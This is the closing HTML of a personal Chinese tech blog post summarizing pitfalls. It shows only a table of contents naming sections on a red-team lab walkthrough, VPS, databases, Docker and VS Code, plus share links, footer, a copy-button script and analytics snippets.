class="toc-number">2.6.</span> <span class="toc-text">VulnstackRedTeam1</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#通关教程"><span class="toc-number">3.</span> <span class="toc-text">通关教程</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#坑点记录"><span class="toc-number">4.</span> <span class="toc-text">坑点记录</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#博客："><span class="toc-number">5.</span> <span class="toc-text">博客：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#VPS"><span class="toc-number">6.</span> <span class="toc-text">VPS:</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#数据库："><span class="toc-number">7.</span> <span class="toc-text">数据库：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Docker"><span class="toc-number">8.</span> <span class="toc-text">Docker:</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Visual-Studio-VScode-："><span class="toc-number">9.</span> <span class="toc-text">Visual Studio&#x2F;VScode ：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#多线程编程"><span class="toc-number">10.</span> <span class="toc-text">多线程编程</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/&text=[掉坑日记]掉坑汇总" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/&title=[掉坑日记]掉坑汇总" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/&is_video=false&description=[掉坑日记]掉坑汇总" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=[掉坑日记]掉坑汇总&body=Check out this article: https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/&title=[掉坑日记]掉坑汇总" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/&title=[掉坑日记]掉坑汇总" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/&title=[掉坑日记]掉坑汇总" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/&title=[掉坑日记]掉坑汇总" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/&name=[掉坑日记]掉坑汇总&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/&t=[掉坑日记]掉坑汇总" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2023
    TonyD0g
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/friends/">friends</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://github.com/TonyD0g">项目</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

    <script type="text/javascript">
        (function(i,s,o,g,r,a,m) {i['GoogleAnalyticsObject']=r;i[r]=i[r]||function() {
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA-84578611-1', 'auto');
        ga('send', 'pageview');
    </script>

<!-- Baidu Analytics -->

    <script type="text/javascript">
        var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "https://hm.baidu.com/hm.js?2e6da3c375c789455b664cea6d4cb29c";
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(hm, s);
        })();
    </script>

<!-- Disqus Comments -->


</body>
</html>
